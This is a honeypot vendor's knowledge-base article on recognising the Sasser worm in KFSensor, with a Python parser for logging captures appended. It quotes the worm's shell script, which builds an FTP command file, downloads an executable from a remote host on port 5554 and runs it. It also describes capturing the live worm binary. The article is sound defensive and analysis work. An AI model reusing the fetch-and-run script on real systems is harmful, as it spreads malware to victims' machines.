KeyFocus - KFSensor Knowledge Base - Sasser

Sasser worm, attack detection

1 May 2004

This article describes how to recognize a Sasser worm attack in KFSensor and how to extend the configuration of KFSensor to capture more information, including a copy of the Sasser worm executable itself.

Worm Information

The Sasser worm exploits the Microsoft Windows Utility Manager Vulnerability (MS04-11). The attack is made via the Windows networking (SMB) port number 445, to access the accessibility options within the operating system which are designed to help users with disabilities. The Utility Manager loads winhlp32.exe but does not drop System privileges, thus allowing the remote attack to be made.

Microsoft released a patch for this exploit on 4/12/2004. All unpatched machines with Windows networking enabled are vulnerable to this exploit.

Sasser infection method

Sasser connects to a target machine on port 445 and gets it to execute a piece of shell code.
If successful, a command line shell is bound to port 9996 on the target machine.
Sasser then executes a script on the remote machine via that shell; the script downloads and installs a copy of the Sasser worm via FTP, from a mini FTP server that Sasser has installed on the attacking machine on port 5554.

Detecting Sasser in KFSensor

KFSensor was already prepared to detect Sasser the moment it was released.

The initial Sasser attack is made via the SMB port 445.

The KFSensor event will appear on TCP port 445 with approximately 9297 received bytes.

The full received data from the worm is as follows:
SMB:1 [neg protocol]
  Protocols:
    PC NETWORK PROGRAM 1.0
    LANMAN1.0
    Windows for Workgroups 3.1a
    LM1.2X002
    LANMAN2.1
    NT LM 0.12

SMB:2 [session setup X]

SMB:4 [tree con X]
    {\\88.88.88.88\ipc$[00]?????}

SMB:5 [nt createX]
    Flags:16 Access:2019F Createop:40 Imp:2
    {\lsarpc[00]}
SMB:6 [trans]
    name: {[10]\PIPE\[00 00]}

SMB:7 [write X]
    Write 4280 bytes at offset 0, timeout(-1) startMessage

SMB:8 [trans]
    name: {\PIPE\[00 00]}

The worm attempts to access the lsarpc pipe and carry out the exploit.

The Sasser worm attempts to execute the following shell script on port 9996:
echo off
&echo open 81.154.214.85 5554>>cmd.ftp
&echo anonymous>>cmd.ftp
&echo user&echo bin>>cmd.ftp
&echo get 645_up.exe>>cmd.ftp
&echo bye>>cmd.ftp
&echo on&ftp -s:cmd.ftp
&645_up.exe&echo off
&del cmd.ftp&echo on

Custom configuration for Sasser

To improve the detection of the Sasser worm, and to deceive future attempts by hackers to probe for machines the worm has already infected, it is necessary to make the following configuration changes to KFSensor.

If you have not already set up KFSensor to emulate Windows networking then you will need to do so.

Add the following definition to emulate the Sasser target shell console:

  1. Select the Scenario -> Edit Scenarios… menu option.
  2. Select a scenario and press the Edit button
  3. Add a new Listen definition
    Name: Sasser worm console
    Protocol: TCP
    Port: 9996
    Time Out: 10000
    Action Type: Read And Close
    Press OK.

Add the following definition to emulate the Sasser target FTP server:

  1. Select the Scenario -> Edit Scenarios… menu option.
  2. Select a scenario and press the Edit button
  3. Add a new Listen definition
    Name: Sasser worm FTP
    Protocol: TCP
    Port: 5554
    Time Out: 10000
    Action Type: Read And Close
    Press OK.

Capturing the Sasser worm executable

It is possible to safely download a copy of the worm for later analysis.
By running a virus checker over it the worm executable can be identified, and there is always the possibility of identifying a new variant.

Configuration

The following configuration uses a KFSensor external alert and a PERL script.

  1. Download the file sassercapture.zip
  2. Unzip the file and extract sassercapture.pl to C:\Program Files\KeyFocus\KFSensor\files\scripts
  3. If you do not already have a Listen defined on TCP port 9996 then you will need to set this up.
  4. Select the Settings->External Alerts menu item
  5. Select the Enable check box
  6. Press the Add... button
  7. Fill in the details as follows:

    The Argument field contains:
    "C:\Program Files\KeyFocus\KFSensor\files\scripts\sassercapture.pl" $eventid
    The Working directory field contains:
    "C:\kfsensor\sasser"
    You will need to create this directory in Windows Explorer.
  8. Press return twice

Results

Warning: When PERL executes the ftp command a console window will appear on the screen while ftp runs.
This window closes automatically when ftp completes its execution.

When a Sasser worm connects to TCP port 9996 the data it sends will be captured, and the PERL script will download the executable and add the event to its own report file.

The log file is called sasserlog.txt and is a tab separated file containing the following fields: EventID, Time, SourceIP, FileName and LocalFileName.

The executable is given the following name: sasser_<filename>_<eventid>.bin
e.g. sasser_22912_up_exe_298961.bin
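The capture logic described above (recognising the worm's port 9996 script and writing the sasserlog.txt record) as an added example in Python; this is not the sassercapture.pl script shipped with KFSensor. It takes a payload captured on port 9996, checks that it has the shape of the Sasser FTP script, extracts the FTP server address, port and filename, and builds the tab-separated log record and the sasser_<filename>_<eventid>.bin local filename in the format the article gives. It performs no download. The sample payload is the script quoted above; the source IP 10.0.0.5, the event id and the timestamp are constructed values.

```python
import re

# Constructed sample: the script Sasser sends to the port 9996 shell, as quoted in the
# article. The worm sends it as one line joined with '&'; newlines are tolerated too.
SAMPLE_PAYLOAD = (
    "echo off"
    "&echo open 81.154.214.85 5554>>cmd.ftp"
    "&echo anonymous>>cmd.ftp"
    "&echo user&echo bin>>cmd.ftp"
    "&echo get 645_up.exe>>cmd.ftp"
    "&echo bye>>cmd.ftp"
    "&echo on&ftp -s:cmd.ftp"
    "&645_up.exe&echo off"
    "&del cmd.ftp&echo on"
)

# 'echo open <ip> <port>>>cmd.ftp' gives the worm's FTP server; 'echo get <file>>>cmd.ftp'
# gives the executable it wants fetched.
OPEN_RE = re.compile(r"^echo open (\d{1,3}(?:\.\d{1,3}){3}) (\d{1,5})>>cmd\.ftp$")
GET_RE = re.compile(r"^echo get ([^>\s]+)>>cmd\.ftp$")

LOG_FIELDS = ("EventID", "Time", "SourceIP", "FileName", "LocalFileName")


def parse_sasser_script(payload: str):
    """Return the FTP host, port and filename from a captured port 9996 payload,
    or None when the payload does not look like the Sasser FTP script."""
    host = port = filename = None
    saw_ftp_script = False
    for raw in re.split(r"[&\r\n]+", payload):
        cmd = raw.strip()
        m = OPEN_RE.match(cmd)
        if m:
            host, port = m.group(1), int(m.group(2))
        m = GET_RE.match(cmd)
        if m:
            filename = m.group(1)
        if cmd == "ftp -s:cmd.ftp":
            saw_ftp_script = True
    # All three markers must be present before we treat the payload as Sasser.
    if host is None or filename is None or not saw_ftp_script:
        return None
    return {"ftp_host": host, "ftp_port": port, "filename": filename}


def local_filename(filename: str, eventid: int) -> str:
    """Build the article's local name: sasser_<filename>_<eventid>.bin, with any
    character that is not alphanumeric or '_' replaced by '_' (so '.' becomes '_')."""
    safe = re.sub(r"[^A-Za-z0-9_]", "_", filename)
    return f"sasser_{safe}_{eventid}.bin"


def log_record(eventid: int, source_ip: str, parsed: dict, timestamp: str) -> str:
    """One tab-separated sasserlog.txt line: EventID, Time, SourceIP, FileName, LocalFileName."""
    fields = (
        str(eventid),
        timestamp,
        source_ip,
        parsed["filename"],
        local_filename(parsed["filename"], eventid),
    )
    return "\t".join(fields)


def append_log(path: str, record: str) -> None:
    """Append a record to the report file, writing the header on first use."""
    try:
        with open(path, "x", encoding="utf-8") as fh:
            fh.write("\t".join(LOG_FIELDS) + "\n")
    except FileExistsError:
        pass
    with open(path, "a", encoding="utf-8") as fh:
        fh.write(record + "\n")


if __name__ == "__main__":
    parsed = parse_sasser_script(SAMPLE_PAYLOAD)
    if parsed is None:
        print("payload is not the Sasser FTP script")
    else:
        # Event id, source IP and timestamp are constructed for this demonstration.
        print(log_record(298961, "10.0.0.5", parsed, "2004-05-01 12:00:00"))
```

The three markers (the open line, the get line and the literal ftp -s:cmd.ftp) are required together so that an unrelated payload on port 9996 does not produce a log entry; a real capture hook would call parse_sasser_script on the event's received data and, only when it returns a result, go on to fetch the file and call append_log.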